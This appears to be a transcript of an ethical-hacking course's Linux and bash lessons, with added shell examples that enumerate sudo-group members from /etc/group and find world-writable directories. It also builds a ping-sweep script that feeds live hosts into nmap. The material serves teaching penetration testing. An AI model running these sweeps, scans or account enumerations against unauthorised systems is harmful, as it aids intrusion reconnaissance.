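    chmod 777 "$dir/hello.txt"
    echo "hello.txt after chmod 777: $(file_mode "$dir/hello.txt")"
    echo "world-writable entries under $dir:"
    world_writable "$dir"
    rm -rf "$dir"
    echo "users with a login shell:"
    printf '%s\n' "$PASSWD_SAMPLE" | login_users
    echo "members of the sudo group:"
    printf '%s\n' "$GROUP_SAMPLE" | group_members sudo
}

demo
```

On a real box the same functions take live input: `printf '%s\n' "$(cat /etc/group)" | group_members sudo` lists who can elevate, and `world_writable /tmp` shows exactly the directories the lesson says a tester looks for, which is why 777 is the easy path and +x on just the script is the safer one.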
you can see the net mask the broadcast address and you can see the mac address as well and we also have a loopback address here now if your machine has a wireless adapter or at some point you want to do wireless penetration testing you're going to need iw config and you should not expect to see anything on this at the moment unless you're using a laptop then you actually might see a configuration down here for it if you would see something under iw config you would see like a wlan 1 wlan 0 something along those lines okay and another common command that we're going to see is going to be the ping command so we can just type in ping and the address that we're trying to talk to so for example i'm going to try to ping my home router and i get talking back so if i tried to ping something that wasn't in my network like a 16.1 you're going to see the results change so with ping here ping is going to be endless until we hit something like control c to stop it it'll ping forever so i'm going to hit ctrl c again and kind of show you the difference so you see that we attempted to ping here and we got replies we got information back well that's good that means we're talking to the other machine it says hey are you there it says yeah i'm there and we try to ping this machine here but this machine's not talking back it could mean that the machine is on the network or that the machine is just blocking icmp traffic icmp is a another word for ping so moving on to the next command i want to show you arp so the best way i like to type in is arp with a switch of a and arp is just going to show you mac addresses that it talks to and the ip address actually i said that backwards it's going to show you the ip address it talks to and the mac address associated with it so if an iep address reaches out say 192 168 15.1 talked out to this machine it's going to say okay hey who are you it's going to send a broadcast message out to say who has this iap address and then the iap address will 
respond; it says "hey, I do, and this is my MAC address." So arp is just a way of associating IP addresses with MAC addresses. And once you know that, you can also look at netstat. So netstat -ano is another one of my favorite commands, and this shows you just the active connections that are running on your machine. So if you scroll way up you can just kind of see what's open and where, what's talking here. Where this really comes in handy on a penetration test is to see if a machine is talking to somebody else. Same thing with arp: you want to know what that machine is associated with, and is it talking to something on a port. So this is more just internal right now, but it's still good to know. So for example, if I were to open up a Firefox page and connect out to the internet, then I went and I did a netstat again, I would see information about that port being open and that I am going out with it. So just kind of keep that in mind. These are not commands that you really need to know in depth right now. Networking does come into play when you are doing penetration testing, but we're going to cover these commands time and time again; I just wanted to give you a very brief introduction to them. Okay, and the last command that I have for you today is route. So if you type in route, that's going to print your routing table, and the routing table is important because it tells you where your traffic exits, essentially. So for this VM my traffic is exiting on 192.168.134.0, so any traffic goes out of this 0.0.0.0 gateway in this range, right? So when it goes out this gateway it's doing NAT, so network address translation, and it's running off my computer. So the best examples aren't here, but it's important to know route as well, because there could be a machine that you're attacking that has multiple routes. So you might see a 134 and a 135 because it has a dual-homed NIC, meaning it has two NICs inside of it, so it's actually talking to a completely different network that you didn't know
existed. So you might have been attacking one network on the 134 range, and then 135 is just out there, and this computer can talk to both, and until that point you had no idea. And that's the idea of what's called pivoting, when you switch a network from one to the other but you're using a machine. So that's it for this lesson. In the next lesson we're going to talk about viewing, creating and editing files.

So in the last video we took a look at different networking commands. In this video I want to show you some updates to those commands. Now, we were running ip, or ifconfig; so we were doing ifconfig, and that works and that's fine, although it is becoming deprecated. So it is still my go-to, if I'm being honest with you, because I like to stay old school, but I do need to show you the new and improved version of ifconfig. So if we take a look, I'm just going to clear my screen here. So the command is ip now. We can say ip a, and we can look at that, and that says ip address. And what do we get here? Well, we get our loopback and we get our Ethernet, and we still get to see what our IP address is, we get to see what our subnet mask is here as well, we get to see our broadcast address. So there's a lot of information here that is provided, which is good. We can also take a look at some of the stuff that I was showing you before. So say we want to look at the arp table; we can say ip n, which stands for neighbor. Let me clear this, and here's our arp table. Okay, so very similar. And if we want to look at routing tables, we can just do ip r. So instead of having to remember "okay, arp" or "we're having a look at route," okay, we can do all of this through one command, which is the ip command. So I just wanted to add this updated video to kind of show you that there is this command out there. This is where the industry is moving, this is something that you should know, but it is perfectly fine in my book if you still want to use ifconfig. Nothing wrong with ifconfig, nothing wrong with using ip a; both are fine. Okay, so just another
command for your repertoire and for your toolbelt, and something to keep in your back pocket. So with that being said, we're gonna go ahead and move on to the next video.

All right, so second to last video here in our Linux series, and this one is a very important one. So we're going to cover a few things: I want to cover how to install files, how to install updates, and how to get files from GitHub. All these are going to be very important and things that you're going to encounter as a pen tester all the time. So from a Linux perspective, let's say that you want to update your system and you're in the terminal. Well, what you can do is you can say something along the lines of apt update, and we'll say also apt upgrade when you're done with that. So what this is going to do is this is going to go out, and you can see these archives.linux (I'll scroll back up here, and all these tools need to be installed), but this archive.linux.edu, so this is what's called a repository. So we're going out to these repositories and we're saying "hey, what's been updated lately and what do we need to download?" And you can see, okay, these packages that are automatically installed, no longer required; we can autoremove them if we need to. And then we have all these new packages that need to be installed; if you look through the list it's quite a bit. And then we've got the packages that'll also be upgraded through here as well. So we have all these updates, upgrades, et cetera. If we want to perform this, it's going to take up 871 megabytes of additional disk space, and it will probably take a little bit of time to download, upgrade, etc. So if you want to do this, go ahead and push your update. You absolutely don't have to to be successful in the course, but just to provide clarification and understanding of how it's done and what it's doing, I just wanted to point that out. Now let's say we just wanted a tool, a specific tool. You see all these things in here, a lot of them are related, like Python, which is interesting because I
do want to install a Python tool. So let's install a tool called pip. So what we're going to do is we're going to say apt install, and then the tool is called pip, but it is python-pip, like this. So type that in, hit enter, it's going to go check for it, it's going to look for it, and it found it, which is great. If it weren't to find it, it would say something a little different; I can show you, like say just hit some numbers in there: it'll say unable to locate that package. So you'll know you're on the right track with the package name here. So I'm going to go ahead and actually hit yes to install this. It's going to go out and download everything we need for pip, and you're going to see why pip is important here. So there is pip and there's pip3. Now, both of those go out and do some installs for us, and we're gonna go ahead and just say yes, and those installs are related to Python. So we're going to use a lot of tools in this course that are related to Python, and it's going to install those tools for us. So pip is for Python, pip3 is for Python 3.
Now, Python 3 is the latest and greatest; Python 2 is actually being deprecated in 2020, or end of service in 2020, so a lot of things are actually moving away from that now. So when we get into the Python section of the course we're actually going to be working completely in Python 3 for this reason solely. So while we wait for this, let's go ahead and go out to the interwebs, and I'm just going to go to Applications up here and then Firefox, terminal. So from here, as an update to the course, I want to introduce a tool and teach you also how to install a tool, so this is kind of serving two purposes here. So I want to go out to Google, and what we're going to do is we're going to look for a tool called pimpmykali, p-i-m-p my kali, just like that. Now, this is written by a guy named Dewalt. He is a pillar of our community in terms of our Discord community; he's very helpful when it comes to the course. If you've ever been in the course Discord or looked at it, you will probably see that he is a part of it, and he's there and he's helping out. He's fantastic. Now, this is up to date; he does a great job of utilizing this. And what he's done is he's taken the new Kali Linux, which anything from 2020.1 and onward has kind of had some issues here or there, and he's created a nice script to fix all of those issues, okay? So we don't have to go through and troubleshoot a lot of things throughout the course; this script just kind of goes in and fixes a lot of things that were wrong. So I really am appreciative of this script, because it is fantastic. What we can do is learn from this as well, though. So what we can do is we could take this code and we could just copy it here, okay? We can hit Ctrl+A, Ctrl+C, or you can hit copy on the clipboard. And what I want you to do is I want you to go out to a terminal; we're gonna go ahead and just sudo su, switch user, okay, and enter in our password. Now we're going to install something from GitHub. So what we're doing, and this is very common by the way, you're going to see this
happen throughout the course. We're going to put this into a folder. So what I want to do is change directories to a folder called opt, /opt just like this, and hit enter, and we're going to put our file here. Now, this is very common; a lot of people tend to put their downloads or installs into the opt folder. It's just a place to keep all these, so this is a common thing to do and a good practice to get into if you've never done this before. So now what we're going to do is we're just going to type in git clone and then we're going to paste it. So you can do Ctrl+Shift+V as a shortcut, or right click and paste. Hit enter, and you can see it started cloning. Now, once it's done cloning, all you have to do is change directory into the file name right here, or the folder name. So cd, we'll just type in pimpmykali, tab, hit enter, okay? And from here we can just do ls, look what's in here. Okay, so you can see pimpmykali.sh. We're gonna go ahead and just run that, so ./pimpmykali.sh just like that, hit enter. All right, and we're going to run 0 here, okay? And this is going to take a minute, so it's gonna go through and run all these upgrades that you see here. So what it's doing is it's fixing some of the issues that we have. So we're fixing Go, when we have to install Go later; we're fixing Impacket, which has some issues on its own in 2020.1 and later; and we're also enabling root login. So there's a lot of things that we're doing here that help us out throughout the course, and it's just a nice overall upgrade. There are some other features here, so as you'll see we have the ability to downgrade from Metasploit 6. So if you do encounter issues in the course you can come back and downgrade to Metasploit 5, which is what we are currently doing, but as you go through the course Metasploit 6 might be working or more functional as these tools upgrade and things go on. You know, you have to kind of evaluate what's working, what's not working, and take it from there. So as the script gets
updated constantly, be on the lookout for these things as they get added or removed, but for now we're just running the 0. We're going through and just adding all these different tools in; you should see it scrolling along like this, and it should function pretty straightforward. So go ahead and let this install. The big takeaway here, and once you're done go ahead, we're going to move on to the next video, but the big takeaway here is that you should be comfortable with using the apt package to go out and download tools, you should be comfortable with upgrading your system through apt, and you should be comfortable now with going out to the web, GitHub at least, and going and downloading a folder or cloning a repository off of GitHub and installing it on your own. It's very straightforward: if the GitHub is good, the GitHub will tell you "hey, here's how you install it," and it'll say these are your instructions, like right here it says git clone, cd into it, ./pimpmykali. Straightforward, and most GitHubs are like this. So as we download tools from the course you're going to get more practice with this and understand it better, but from here you're going to just take it and go. And here you can see something that we talked about, is that we lost the ability in 2020.1 to use root. This will allow you to run root in Kali if you want. Here we're just going to type in no. Unless you know what you're doing you could type in yes, but again, as stated in the sudo video, if you are not familiar with Linux it's best practice just to keep hanging out in sudo and utilizing it that way as a low-level user. And again, we're just going to let this run, and I will catch you over in the next video.

So there's one more tool I want to install, because I use it quite a bit throughout the course as my go-to note editor, and I'll talk about some alternatives as well, but I just want to make sure that you have it installed and you have it at your disposal if you want to use it. It's
not the only text editor in Linux, and I'll show you those options, but that tool is going to be called gedit. So if you just do apt install gedit, like this; actually, let's do a sudo apt install, like that, enter in our password, and then go ahead and just hit enter for yes. We're going to let this install, and it should be pretty quick. Now, what this is going to allow us to do is just have a text editor option. You're gonna see this in use in the next video, but we're gonna say gedit test.txt as an example, and it'll bring up this text editor. Plain and simple, that's all it is. Now, you'll get some warnings like this; if you see a warning, just ignore it, don't even worry about it. As long as you're able to get into the text editor and edit, that's fine. I'm going to close this out without saving. Another thing that you can do is you can use mousepad and just say test.txt; that's fine. And you can use nano test.txt, same thing, and you'll see these throughout the course, so don't worry about having to memorize them right now. But there's a few different text editing options; I just wanted to install gedit and show you gedit because I use it so much throughout the course, and they removed it from Kali Linux in 2020.1, I believe. So I just want you to be familiar with it and know how to use it if you want to. So that's it, we're gonna go ahead and move on to the next video.

Okay, so this is my second time recording this video. The first time I forgot to turn my microphone on and performed for my cat, so she approved of it; let's see if you approve of it the second time around, now that I have a little bit of practice. So what we're going to be talking about today is viewing, creating and editing files. So I've already showed you the echo command. If you recall, we used echo to create a file, right? We created a hello.txt, and we can just echo hello out to the terminal. We could say echo hello and it'll say hello back. So what we can do with echo is we can use it to write to a file. So if we were to say
echo hey and then we write it to hey.txt, well, we can look and see that hey.txt is here, and you can see my files from the previous one. So I'm trying to come up with more ways of saying hello, but we're going to use hey.txt here. So if we cat hey.txt, all cat does is print out to the screen what is in a file; it says hey. Okay, so let's say we want to append cat, or we want to append hey.txt. Well, we can tab up here. What if we just say hey again? We've got this greater-than symbol here, and we're just putting it into the hey.txt file. Well, that didn't work; we didn't append it, we actually overwrote it. So what can we use to actually append this here? What we can do is we could say hey again again, right, just to give us something different, and we can add a second greater-than symbol here. So now if we cat the file, you can see that we actually appended to the end of it. So this becomes incredibly useful when we are either adding stuff to a list, say we're gathering IP addresses and we just want to combine our lists, or when we're creating a series of commands and we're going to use those commands to send all at once. We're going to cover that later when we talk about file transfers in the penetration testing section, where we use a set of commands like this on a Windows machine to actually transfer files via FTP. It's just so much easier than typing them all in one by one; we can create a little document and run the document. So this becomes useful when we have a series of commands, and for other reasons as well, as you'll learn as you go on in your Linux career. So we've talked about echo and we've talked about cat, so let's talk about some other ways to create a file. We can use something called touch and just say newfile.txt, and if we ls you can see that newfile.txt is here. But if we cat newfile there's nothing in there, because we haven't put anything in there yet. So there's a few things that we can do: we could use echo and append the file, right? We could also use a tool
called nano. Now, nano is a terminal text editor. There are other terminal text editors like vi and vim; I don't prefer those personally, I like nano the most. Some people have their preferences, so I encourage you to play around with any of them as you wish; vi and vim are the other two, but for this course we're going to be using nano. So if I say nano newfile.txt, I could type whatever I want in here, and we're going to be using nano a lot to create scripts, to create Python scripts, and to edit shellcode as we get into a little bit of exploit development. So I'm going to hit Ctrl+X, I'm going to hit Y for saving, and then we'll save it to newfile.txt. If we cat this now, it says "hey, I could type whatever I want in here." So that's one way of editing it. Another way of editing it is using a graphical interface, so we can use gedit and say newfile, and if you don't like using a terminal you're more than welcome to use gedit here. Just type in "new line" here and save it. And I like using gedit; it's a lot cleaner, because I can, you know, highlight and delete, I don't have to use my keyboard to navigate around like I do in the terminal. So if you have the option, use gedit for sure, but sometimes you're going to be on another machine that's not your own, or is headless and doesn't have a GUI, that you're going to have to use nano on, so get comfortable using both. So we save this, let's go ahead and cat it out and see what happens. Okay, you can see that the new line is in there. So really that's the overview that I wanted to cover. So just know that you can create files pretty much using echo, touch, and actually you can create files using nano as well. If you say nano thisisnew.txt, I'll just say hello, Ctrl+X, save it, you ls, you can see thisisnew.txt is right here. So you can use all of these tools in different ways to create files; it's completely up to you how you want to do it. Personally, when I'm creating a file I use nano, and I just create a new shell script, Python script,
text document that way. You could also do it using gedit as well. So just know that we're going to be using these a lot, and try to get comfortable with these. And from here we're going to be moving into controlling Kali services, so we're just going to briefly talk about what services you need running on boot and how to do that.

Last video in the section, and this is going to be one of my favorites. So what we're going to be talking about is scripting with bash. I'm going to show you some cool tricks that we can do to kind of narrow down some of the results that we get, and then I'm going to show you how you can automate some of that process, and we'll take that and even write out some for loops and one-line loops, which this might not make any sense right now, and that's absolutely okay, but by the time the video is done hopefully it does. So the first thing I want to show you is I want to show you how we're going to write a ping sweep. So we're going to write a ping sweeper: basically we're going to go out and say "I want to ping a device; if that device is alive, go ahead and show me that result," and we're going to sweep an entire network. So what we're going to do first is we're going to identify a device that's alive, so we can test this out and then build upon that. So you can go ahead and type in ifconfig and then just hit enter. Now, my Ethernet here is on a NATted network, so I'm running through a different IP address subnet here, so this one is 192.168.57.150.
My actual IP address is on a .4.x here, so for this example I'm going to be pinging 192.168.4.29. However, and you can see here's the ping that we're getting back, however, if you are unsure of an IP address in your house that is active, or your subnet in your house, that's okay, you can just run 57.1 for this example. You might not get a lot of return results, however; you might only get one or two when we do this sweep. So I advise you to figure out what your IP address is; that's a good challenge anyway. And if you are familiar with networking, which you should be at this point, then you should be able to determine the IP address of your home network. But if you do not do that, then you can use 57.1, or whatever your IP address is here on this third octet, so that will also work if you see that. All right, so I'm going to clear this. Now, what are we noticing when we're pinging? We're pinging this address and we're getting some data back. Now, if we ping an active address, you can see that we get, okay, 64 bytes from 192.168.4.29; it's saying it's active, we're getting details back. If we were to ping something, let me do like .41,
where we just don't get any data back, okay. And let's try this one more time, let's try this a different way: let's do like a count of one. -c 1 will do a count of one; it's going to try to send one packet over and see if it works. Nothing's happening, right? It's trying to transmit that packet; you could see that it's getting zero received here, where here it's getting four received. No data is coming back; it's just not doing anything for us. So the thing that we can identify here is, what's the big difference? If we look at line one and two versus line one and two, what are we seeing when we get data back? Well, the big difference here is, well, two of them I guess: we see that we get this response, right, that's a big difference, and then down here it'll say "hey, we received some packets" if it's not zero. Now, the easy way to do this is to look at a line that says "hey, we received data," which is this line here, okay? Now what I want to do is I want to narrow this down just a little bit. What we're going to say is we're just going to do a ping of one time. So I'm going to clear this, I'm going to bring it back to this, like this, I'm going to do a count of 1, and that should just ping once, and that's perfect. We don't need to ping endlessly; we just want to make sure we can ping once and then we're done, okay? And then from here I'm going to put this into a text file; I'm just going to call this ip.txt, just like that. So when I cat out ip.txt now, you can see that I have this file, it's stored, I don't have to run the command again; we're good to go. So what we're going to do now is we can take this and then we can start gathering data based off of what we see here. So what I want to do is I want to just extract this one line here, the "64 bytes from 192.168.4.29," and the best way to do that is with a command called grep. So grep is going to look for a specific term or phrase, and we can do that, and it's going to pull down any line that has that term or phrase. So if I say grep here, and then I just put
in quotation "64 bytes," like this, now when I cat out this, all I'm pulling down is this line, and it's even highlighting it for us. It's saying here's the line that we see, 64 bytes from 192.168., okay? So we've extracted just the one line. And why am I extracting this line? Well, if we're building out a ping sweeper, what I want to do is I want to sweep every single IP within a specific subnet. So say this .4, right? I want to ping .4.1, .2, .3, all the way through 254, 255. I want to see if I can get through all the IP addresses in a subnet. So what we're going to do is we're going to ping every single one of them and say "hey, are you up, are you there?" And we're going to do it with the count of one, and we're gonna say "are you there?" okay, and if they're there they're gonna say "yeah, I'm here, 64 bytes, here's my response," and it's going to say 64 bytes from this IP address. So we want to extract the IP addresses that say "yeah, we're alive." That's basically our goal here. So when we run this on a bigger scale, which is what we're going to do, we're going to need to grep out this information and extract this information to where we only just get the IP address back, okay? So what we're going to do now is we're going to start narrowing down and grabbing this IP address, and then I'm going to show you how we're going to take this all in one instance and run it and then extract IP addresses. So from here, what I want to do is I want to do another command. So every time we pipe, we're saying "hey, run this command, then with that command run this command, then also run this command too." So we're going to keep running this command on top of this to narrow things down. So here's what we're doing here: we're going to run a command called cut, and with cut we're going to say I want to cut something out of this. We need to provide it what is called a delimiter, so we do a -d like this, and the delimiter I'm going to use is a space, and then I'm going to say -f for field, and then I'm going to say 4. Okay, what is this
doing? Well, it's saying "hey, I want to cut this line that you're getting back on a space." So the delimiter's a space, so here's a space, here's a space, here's a space, and it says I want to count up to 4 to grab that data. So 1, 2, 3, 4, right here. So if we say 4 here like this, we hit enter, we're grabbing that specific IP address, because we're doing it by spaces. If we did it on 3, what do you think we're going to grab? We're going to grab the word "from," so you can see here it's "from." So what I want to do is grab the IP, so we're going to use this cut just like this, use our delimiter, and then get to the correct field position that we want to grab the IP address. All right, so we've got the IP address. Now there's only one thing wrong here with this IP address, is that there is a little colon on the end of it. We just want this without a colon at all; we want it just like this. Now there's a couple ways we can do this. We could use something called sed; sed is a little bit complicated and a little bit advanced, I would say, for where we're at right now, so I'd rather teach you an easier way to do this, and that is called translate. So with translate, all we're going to do is we're going to do one more pipe, like this, and we're just going to say tr for translate, a -d for a delimiter again, and then we're going to say we want to get rid of this, and that's it; we're just getting rid of this, okay? So if we run this one more time, now you can see that we've successfully extracted this IP address out. That's our goal, that's all we wanted to do. Now, how can we apply this to something bigger? How can we make this part of a bigger script? That is the question, and we're going to do that. So what I want you to do is I just want you to copy this, okay, copy this entire line, and we're going to go into a mousepad. So let's copy this selection, and I'm going to clear my screen, I'm just going to say mousepad, and we're going to call this ipsweep.sh, okay? So this is going to be a bash script, and I'm going to make this
bigger. And the first thing we're going to do with our bash script is we have to declare that it's a bash script. We're going to say hashbang right here, or shebang is what we'd call this, /bin/bash. This allows the machine to know when we run this, this allows bash to know "hey, we're calling this, here's the location of bash, this is what we're running with the script." You're also going to see this when we use Python as well; you'll see the declaration here at the top, or when we're calling this out. So I'm going to go ahead and Ctrl+S and save this; that'll add some nice color to this, so when we're coding this out we get to see in color. I like that a lot. I'm going to actually make this a little bit smaller and then make this like this here, so we can get the whole picture, okay? So what I want to do is I want to paste in what we just wrote, so I'm just going to Ctrl+V here and paste that in. So we don't need to do a cat of an IP address here in this instance; instead we're going to change this back. We're going to ping, remember, we want to ping every device in the network. So we want to ping, say, if we're pinging 192.168.4.x, okay, we want to ping that, and we can leave this like this for now; don't worry about changing anything here, this is just going to be a placeholder. We're going to do a little bit of extra syntax here to make this work. So we're going to write what is called a for loop. So we're going to say for, and I'll explain what this does here in a second. You're also going to see this again when we get into Python and coding, and so you'll be able to understand more and more about loops and what for loops are, while loops, etc. They're very, very useful and very common in coding and scripting. So I'm going to say for ip in, and then I'm going to say sequence 1 through 254. Now, very important: this character here is not an apostrophe, okay? This is not an apostrophe; this is the little line, I don't know what it's called, it's above the tilde, next to your
Escape button on your keyboard. So it's this right here, okay? It's like a backwards apostrophe, almost. I'm sure there's a term for it, I just don't know it. So you come in here and you say, okay, for ip in sequence 1 through 254, and I'm going to explain what all this does in a second. I want you just to type this out for now. I want you to say do, all right, and then I want you to come down here and we're going to say ampersand on this line, and we're going to say done. I'm going to explain what all this means, okay? So this is a loop that we've just created. What we're saying is for the IP address, and we're just declaring this; this could be bob if you wanted to, I'm just making it a name or a term that's easy for us to remember. So we're going to say for ip, but if you want to call this bob, call it bob. For ip in sequence 1 through 254: so what sequence is doing is it's saying "hey, I want to count everything from 1 to 254." So 1, 2, 3, 4, 5, 6, 7, 8, all the way to 254. This for loop means I'm going to do this every single time. So for ip in 1, for ip in 2, for ip in 3, we're going to run this command until we're done, so until this sequence has run 255 times it's done, okay? And now we're going to say I want to do a count of $ip. So what we're saying here is, for ip in sequence one through 254, go ahead and do a ping -c for a count of one, 192.168.4, 254, and here we're going to say 1, 2, 3. Every time this loops over and over and over, it's going to be incrementing that number through this sequence. That's all we're doing; this is a basic loop, okay? So we're going to keep going through and through and through. Now, this will work if you plugged in your hard-coded IP address here; this will absolutely work. Now, we can improve this just a little bit if we want to. So what's going on here is what we're going to say is, if we wanted to run this, we would just do ./ and then ipsweep, okay, and this would work, that's fine. But we can make this a little bit
better from a coding perspective. We can come in here and we can give this a $1, and that means argument one. So what we're saying here is I want to give an argument instead. So if you want to be technical, this first ./ipsweep.sh, that is argument zero, so you can consider this $0. Argument one would be what you type after that, so this would be argument one, argument two, etc. So in this case, what we could do is we could say I wanna run 192.168.4, like this, and this will run the .1, .2, .3 after it. So you provide the argument, it places that here in argument 1, and then it does the rest for you. So this way you can specify your network, and if you wanted to ping multiple networks you don't have to come back in here and keep changing this; it just works. So super easy; this is a great little script for a /24 type subnet, okay? Okay, so let's go ahead and try running this really quick. I'm going to just Ctrl+S, save this, I'm going to close it, we're going to do a chmod +x on ipsweep, if it'll allow us to; we might have to do a... okay, let's do ls -la real quick, make sure it worked. It sure did, okay. So here's what we're going to do: we're going to run the ipsweep and we're going to say 192.168.
You just put in your IP here. I'm going to run that, all right, and you can see all the devices that are coming back within my network here. I'm going to go ahead and hit Ctrl+C, cancel this out. And so this is grabbing all the different devices in my network. Now that's great, that works out really well, but what we can do is improve this. What if I typed in a... what if I didn't type anything at all? What if I just hit enter here? Now I'm just getting all kinds of pings, unknown, and it's going off of some of the stuff I was doing before, but it just causes all kinds of issues and errors, right? So you can see I'm trying to hit Ctrl+C; it's taking its time to break. Here we get issues because we're just allowing any sort of argument here. What we need to do is we need to fix this up just a little bit.

So what we can say is we can come back in here and just go mousepad ipsweep.sh, and come in here, and let's add a little bit extra. Oh, and I also left this in here; don't leave this in here, that's why that was running twice. Okay, so what we're doing here is we need to add in a statement. What we're going to do is we're going to add in an if statement. If statements are conditions: we're saying, hey, if this condition is met, do something for us; if it's not met, then go ahead and do something else. All right, so we're going to say if, and we're going to just put in here $1 is equal to nothing, then we're going to go ahead and just say then, echo You forgot an IP address, echo Syntax, something like this; we'll just say ipsweep.sh and we'll go 192.168.4, like that. Okay, and then if we did do this correctly, if we do have an argument inside of argument one, then we're going to say else, do all of this here, and be done, and then we're going to end our if statement with fi.

Now this script, or this resemblance of this script, is not one of my own, by the way. This goes... credit to something I've modified over time, but the original credit definitely goes to Georgia Weidman.
I remember seeing this in her course a long, long time ago when I was first getting started, and she did a great job of teaching this. This is just a modification of this script, so I just want to make sure that all credit goes to her. But looking at this, let's break this down really quick before we run this again. We've got an if statement; we said if argument 1 doesn't equal anything, then you're going to echo back out and say, hey, you forgot an IP address, here's the syntax. If it does include something, then we're going to go ahead and come in here and say let's run our for statement, or for loop, and run through it, and then we're going to end our if here. The only thing that I'm doing uniquely here is I'm including this ampersand, which is going to run this command multiple times at once. This is a good way to explain it: basically we have a couple of ways of doing this. We could say, like this, we can put a command here, and this will run one at a time; it'll say okay, for 1, for 2, for 3. This allows multiple instances of this loop to run at once and just speeds things up. I can show you the difference between that.

So I'm going to go ahead and just Ctrl+S, save this, and I'm going to go ahead and just run this script real quick. Now let's try running it without anything here. Okay, now look, it says you forgot an IP address. So look, we did that correctly. Now let's go ahead and add the 192.168.4, run it, and you can see, okay, it's sweeping, but it's taking its sweet time, especially for the IP addresses that are going to hang, like if I don't have a .2 or .3, it's going to take a while. So I'm going to Ctrl+C and get out of this, if it'll let me, and it looks like it's actually going to hang. So what we can do is we can come back in; I'm going to open a new tab real quick just while that's waiting, and I'm just going to say mousepad, and we're just going to go back into ipsweep.sh. It's in this folder; there we go. Okay, so from here I'm going to change this back to the ampersand
and I'm going to save it. I just want you to see the difference really quick and why I run it like this. So ipsweep.sh 192.168.4: you can see it's picking everything up really fast. All right, what I can do now is I can run this and then store this into, like, ips.txt, something like that, just like found IP addresses. Okay, so now if I cat ips.txt, I have all the IP addresses I just found, and I found them that fast, versus this, which may still be going, and it is, and I can't even kill it; I'm just going to close this out. Okay, so this is the big difference there with that ampersand, and the speed and what it's capable of doing.

So with all that being said, we could take this and do one more thing. So I want to show you how we can utilize a one-liner. These are called one-line statements in bash, and we can do something similar to what we just did and accomplish that in this command line. So now we have an IP address, we have a list of IP addresses. Let's say that we want to run nmap. Now we haven't gotten to nmap yet; you don't need to really know about it, just know that it is a tool that allows us to go out and do port scanning, okay? So typically we would just say something like nmap, and we might do something like -T4 -A -p-, like this. This is just saying I want to run an nmap scan, I want to look at everything, and I want to scan all ports. This is just an example; you can just run nmap IP address like this and that would be fine too, like we could just go 192.168.4.29 and we'll do a quick nmap scan, okay? But what we can't do here is we can't just say, hey, I want to run... well we could, we could say I want to run nmap for everything in .0/24.
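Putting the whole lesson together, here is the sweep script as an added example; it is not the course's own ipsweep.sh or Georgia Weidman's original. The empty-argument check, the usage message, the seq loop, the backgrounded ping and the redirect into ips.txt follow the lesson; the grep/cut/tr filter that reduces each reply to a bare address (so ips.txt holds only IPs), the format check on the prefix, the per-probe timeout, the wait, and the function names are my additions.

```shell
#!/bin/bash
# ipsweep.sh, reconstructed as an added example (not the course's own file).
# Added beyond the lesson: the reply-to-IP filter, the prefix format check,
# the per-probe timeout, the wait, and splitting the work into functions
# so each piece can be exercised on its own.

# Prints the usage message from the lesson (hypothetical helper name).
usage() {
    echo "You forgot an IP address"
    echo "Syntax: ./ipsweep.sh 192.168.4"
}

# Exit status 0 when $1 looks like the first three octets of a /24
# (e.g. 192.168.4), 1 when it is empty or malformed. The lesson only
# tests for an empty argument; the format check is an addition.
check_prefix() {
    [ -n "$1" ] || return 1
    printf '%s\n' "$1" | grep -Eq '^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$'
}

# Reads ping output on stdin and prints only the address of each reply:
#   "64 bytes from 192.168.4.1: icmp_seq=1 ttl=64 time=0.3 ms" -> "192.168.4.1"
# Hosts that do not answer produce no "64 bytes" line, so they are dropped.
reply_to_ip() {
    grep "64 bytes" | cut -d " " -f 4 | tr -d ":"
}

# Pings .1 through .254 under the given prefix. The trailing "&" starts
# every ping in the background, as in the lesson, so all 254 probes run
# at once instead of one after another; "wait" then blocks until they
# finish. -W 1 (Linux iputils ping, an addition) caps each probe at one
# second so silent hosts cannot hang the sweep.
sweep() {
    prefix="$1"
    for ip in $(seq 1 254); do
        ping -c 1 -W 1 "$prefix.$ip" 2>/dev/null | reply_to_ip &
    done
    wait
}

main() {
    if ! check_prefix "$1"; then
        usage
        return 1
    fi
    # Same redirection as the lesson: the live hosts end up in ips.txt.
    sweep "$1" > ips.txt
    cat ips.txt
}

# Run only when invoked as the script itself (./ipsweep.sh 192.168.4), so
# the functions above can also be sourced into a shell without sweeping.
case "${0##*/}" in
    ipsweep.sh) main "$@" ;;
esac
```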
The issue is it's going to take time looking and finding what IP addresses are valid here. If we have a list, we can automate this process quite a bit. We can just come in here and we can say something a little bit different. We can say, hey, for ip (we're using the same kind of syntax) in, dollar sign, and we're going to put parentheses here, we're going to say cat, and then we're going to say ips.txt, and then we're just going to do this: we're going to say do nmap $ip, and then again we have the option of doing done, or we can do ampersand done, just like this. Okay, I'm just going to do done here as an example and just show you. So this is really easy: we're saying, hey, for every IP address in this list (and all we're doing is we're cat-ing out this IP list that we just had), it's going to take the first IP, then run the nmap scan, and it's going to come back and run the next one. So until this list is completely done, it's going to keep going through this loop. That's all it is, a simple loop. Then we're going to say done. It's going to take that IP address, it's going to start scanning it, it's going to go through and hopefully find information, and go in a loop. So this is a quick way to automate some of this process. I actually do this with a lot of my scripts, where I will do some probing, see if anything is out there that's alive, put it into an IP file (and you're going to see this later in the course), and then nmap scan that. So think about this; hopefully this gets your wheels spinning on what you can do to really start scripting some of this stuff out, and this is going to be the first time you get your hands dirty with scripting. We're going to go on again with this and we're going to get more advanced as we go, but this should be a good introductory lesson to you on how we can build a simple tool and automate a lot of this process fairly easily with just a little bit of command line syntax. So we're going to go ahead and move on to the next section, and I will see you over there.

Welcome to
this module on Python. So if you've never used Python before, or even heard of Python before, Python is a coding and scripting language. It is commonly used in ethical hacking, and it's commonly used all around the world. It is actually considered one of the best beginner languages to start with if you've never learned coding before, so that's exactly what we're going to do: we're going to cover some of the basics of Python. So we'll cover everything you see on this screen here: strings, math, functions; we're going to get into conditional statements and looping; we'll get into some more advanced items; and eventually we're going to build our own tools. So we're going to be building a port scanner at the end of the lesson, and then when we get into the exploit development section of this course, we're going to use Python again to write our own exploits. So it's going to be used throughout the course. You're going to see it again as an ethical hacker as well: you're going to go onto websites and you might need to download Python code or something to utilize against a host or a client, and it's just going to be frequently seen for you. So, very important topic to cover, especially for the foundations.

